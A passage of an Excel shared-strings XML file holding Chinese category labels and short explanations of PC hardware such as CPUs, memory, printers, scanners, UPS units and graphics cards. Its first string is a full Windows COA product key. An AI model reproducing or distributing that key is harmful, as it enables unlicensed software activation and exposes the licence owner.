    <t>COA认证码：H8BR-QQHRT-HJKTV-DK8K8-3HG46</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电脑硬件组装</t>
  </si>
  <si>
    <t>电脑硬件组装图</t>
  </si>
  <si>
    <t>电脑硬件组装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件</t>
  </si>
  <si>
    <t>windows系统内容</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows系统内容路径</t>
  </si>
  <si>
    <t>windows系统内容路径</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>行标签</t>
  </si>
  <si>
    <t>dreamweaver</t>
  </si>
  <si>
    <t>office</t>
  </si>
  <si>
    <t>PC基础</t>
  </si>
  <si>
    <t>VF</t>
  </si>
  <si>
    <t>word</t>
  </si>
  <si>
    <t>光盘刻录</t>
  </si>
  <si>
    <t>杀、控、防、优化</t>
  </si>
  <si>
    <t>数码</t>
  </si>
  <si>
    <t>网络</t>
  </si>
  <si>
    <t>系统安装</t>
  </si>
  <si>
    <t>系统操作</t>
  </si>
  <si>
    <t>帐户</t>
  </si>
  <si>
    <t>(空白)</t>
  </si>
  <si>
    <t>总计</t>
  </si>
  <si>
    <t>计数项:Title</t>
  </si>
  <si>
    <t>tips</t>
  </si>
  <si>
    <t>tips</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件</t>
  </si>
  <si>
    <t>软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统操作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中央处理器（Central Processing Unit）的缩写，即CPU，CPU是电脑中的核心配件，只有火柴盒那么大，几十张纸那么厚，但它却是一台计算机的运算核心和控制核心。电脑中所有操作都由CPU负责读取指令，对指令译码并执行指令的核心部件。</t>
  </si>
  <si>
    <t>cpu</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的主要运作原理，不论其外观，都是执行储存于被称为程式里的一系列指令。在此讨论的是遵循普遍的架构设计的装置。程式以一系列数字储存在电脑记忆体中。差不多所有的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的运作原理可分为四个阶段：提取（</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Fetch</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）、解码（</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Decode</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）、执行（</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Execute</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）和写回（</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Writeback</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>前端总线</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(FSB)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>频率</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>即总线频率</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>是直接影响</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>与内存</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>直接数据交换速度。有一条公式可以计算，即数据带宽＝</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>总线频率</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>×</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>数据位宽</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>)/8</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，数据传输最大带宽取决于所有同时传输的数据的宽度和传输频率。比方，现在的支持</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>64</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>位的至强</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Nocona</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，前端总线是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>800MHz</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，按照公式，它的数据传输最大带宽是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>6.4GB/</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>秒。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外频与前端总线</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(FSB)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>频率的区别：前端总线的速度指的是数据传输的速度，外频是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与主板</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>之间同步运行的速度。也就是说，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>100MHz</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外频特指数字脉冲信号在每秒钟震荡一亿次；而</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>100MHz</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端总线指的是每秒钟</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可接受的数据传输量是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>100MHz×64bit÷8bit/Byte=800MB/s</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>传真机是应用扫描和光电变换技术，把文件、图表、照片等静止图像转换成电信号，传送到接收端，以记录形式进行复制的通信设备。</t>
  </si>
  <si>
    <t>　市场上常见的传真机可以分为四大类：1、热敏纸传真机（也称为卷筒纸传真机）；2、激光式普通纸传真机（也称为激光一体机）；3、喷墨式普通纸传真机（也称为喷墨一体机）；4、热转印式普通纸传真机。传真机的工作原理很简单，即先扫描即将需要发送的文件并转化为一系列黑白点信息，该信息再转化为声频信号并通过传统电话线进行传送。接收方的传真机“听到”信号后，会将相应的点信息打印出来，这样，接收方就会收到一份原发送文件的复印件。但是四种传真机在接收到信号后的打印方式是不同的，他们的工作原理的区别也基本上在这些方面。</t>
  </si>
  <si>
    <t>　　1、热敏纸传真机（也称为卷筒纸传真机）：热敏纸传真机是通过热敏打印头将打印介质上的热敏材料熔化变色，生成所需的文字和图形。热转印从热敏技术发展而来，它通过加热转印色带，使涂敷于色带上的墨转印到纸上形成图像。最常见的传真机中应用了热敏打印方式。</t>
  </si>
  <si>
    <t>　　2、激光式普通纸传真机（也称为激光一体机）：激光式普通纸传真机是利用碳粉附着在纸上而成像的一种传真机，其工作原理主要是利用机体内控制激光束的一个硒鼓，凭借控制激光束的开启和关闭，从而在硒鼓产生带电荷的图象区，此时传真机内部的碳粉会受到电荷的吸引而附着在纸上，形成文字或图像图形。</t>
  </si>
  <si>
    <t>　　3、喷墨式普通纸传真机（也称为喷墨一体机）：喷墨式传真机的工作原理与点矩阵式列印相似，是由步进马达带动喷墨头左右移动，把从喷墨头中喷出的墨水依序喷布在普通纸上完成列印的工作。</t>
  </si>
  <si>
    <t xml:space="preserve">传真机facsimile apparatus </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打印机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>打印机（printer) 是计算机的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>输出设备</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>之一，用于将计算机处理结果打印在相关介质上。衡量打印机好坏的指标有三项：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>打印分辨率</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>打印速度</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>和噪声。</t>
    </r>
  </si>
  <si>
    <t>　　分为点阵打印机，针式打印机，喷墨式打印机，激光打印机等。针式打印机通过打印机和纸张的物理接触来打印字符图形，而后两种是通过喷射墨粉来印刷字符图形的。</t>
  </si>
  <si>
    <t>复印机属模拟方式，只能如实进行文献的复印。今后复印机将向数字式复印机方向发展，使图像的存储、传输以及编辑排版（图像合成、信息追加或删减、局部放大或缩小、改错）等成为可能。它可以通过接口与计算机、文字处理机和其他微处理机相连，成为地区网络的重要组成部分。多功能化、彩色化、廉价和小型化、高速仍然是重要的发展方向。</t>
  </si>
  <si>
    <t>　　复印机是从书写、绘制或印刷的原稿得到等倍、放大或缩小的复印品的设备。复印机复印的速度快，操作简便，与传统的铅字印刷、蜡纸油印、胶印等的主要区别是无需经过其他制版等中间手段，而能直接从原稿获得复印品。复印份数不多时较为经济。</t>
  </si>
  <si>
    <t>复印机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光驱</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>光驱，电脑用来读写光碟内容的机器，是</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>台式机</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>里比较常见的一个配件。随着</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>多媒体</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>的应用越来越广泛，使得光驱在台式机诸多配件中的已经成标准配置。目前，光驱可分为</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CD-ROM驱动器</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>、DVD光驱(</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>DVD-ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)、</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>康宝</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(COMBO)和</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>刻录机</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>等。</t>
    </r>
  </si>
  <si>
    <t>内存（Memory）也被称为内存储器，其作用是用于暂时存放CPU中的运算数据，以及与硬盘等外部存储器交换的数据。只要计算机在运行中，CPU就会把需要运算的数据调到内存中进行运算，当运算完成后CPU再将结果传送出来，内存的运行也决定了计算机的稳定运行。 内存是由内存芯片、电路板、金手指等部分组成的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　内存又称主存，是CPU能直接寻址的存储空间，由半导体器件制成。内存的特点是存取速度快。内存是电脑中的主要部件，它是相对于外存而言的。我们平常使用的程序，如Windows操作系统、打字软件、游戏软件等，一般都是安装在硬盘等外存上的，但仅此是不能使用其功能的，必须把它们调入内存中运行，才能真正使用其功能，我们平时输入一段文字，或玩一个游戏，其实都是在内存中进行的。就好比在一个书房里，存放书籍的书架和书柜相当于电脑的外存，而我们工作的办公桌就是内存。通常我们把要永久保存的、大量的数据存储在外存上，而把一些临时的或少量的数据和程序放在内存上，当然内存的好坏会直接影响电脑的运行速度。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>扫描仪 scanner 是一种计算机外部仪器设备，通过捕获图像并将之转换成计算机可以显示、编辑、存储和输出的数字化输入设备。对照片、文本页面、图纸、美术图画、照相底片、菲林软片，甚至纺织品、标牌面板、印制板样品等三维对象都可作为扫描对象，提取和将原始的线条、图形、文字、照片、平面实物转换成可以编辑及加入文件中的装置。</t>
  </si>
  <si>
    <r>
      <t>　　扫描仪中属于</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>计算机辅助设计</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CAD</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>）中的输入系统，通过计算机软件和计算机，输出设备（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>激光打印机</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>、激光</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>绘图机</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>）接口，组成网印前计算机处理系统，而适用于办公自动化（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>OA</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>），广泛应用在标牌面板、印制板、印刷行业等。</t>
    </r>
  </si>
  <si>
    <r>
      <t>UPS</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的中文意思为</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不间断电源</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，是英语</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“Uninterruptible Power Supply”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的缩写，它可以保障</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计算机</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统在停电之后继续工作一段时间以使用户能够紧急存盘，使您不致因停电而影响工作或丢失数据。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UPS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>据IDC统计，全部电脑故障的45%是由电源问题引起的；</t>
  </si>
  <si>
    <t>显卡的用途是将计算机系统所需要的显示信息进行转换驱动，并向显示器提供行扫描信号，控制显示器的正确显示，是连接显示器和个人电脑主板的重要元件，是“人机对话”的重要设备之一。显卡作为电脑主机里的一个重要组成部分，承担输出显示图形的任务，对于从事专业图形设计的人来说显卡非常重要。 民用显卡图形芯片供应商主要包括AMD（ATI）和Nvidia(英伟达)两家。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1、从总线（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>bus</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>）进入</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">GPU </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>（Graphics Processing Unit，图形处理器）------将</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>送来的数据送到GPU（图形处理器）里面进行处理。</t>
    </r>
  </si>
  <si>
    <t>2、从 video chipset（显卡芯片组）进入video RAM（显存）------将芯片处理完的数据送到显存。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、从显存进入</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Digital Analog Converter </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>= RAM DAC</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，随机读写存储模</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数转换器），</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>------</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将显示显存读取出数据再送到</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>RAM DAC</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进行数据转换的工作（数字信号转模拟信号）。</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 4</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、从</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> DAC </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进入显示器</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Monitor</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
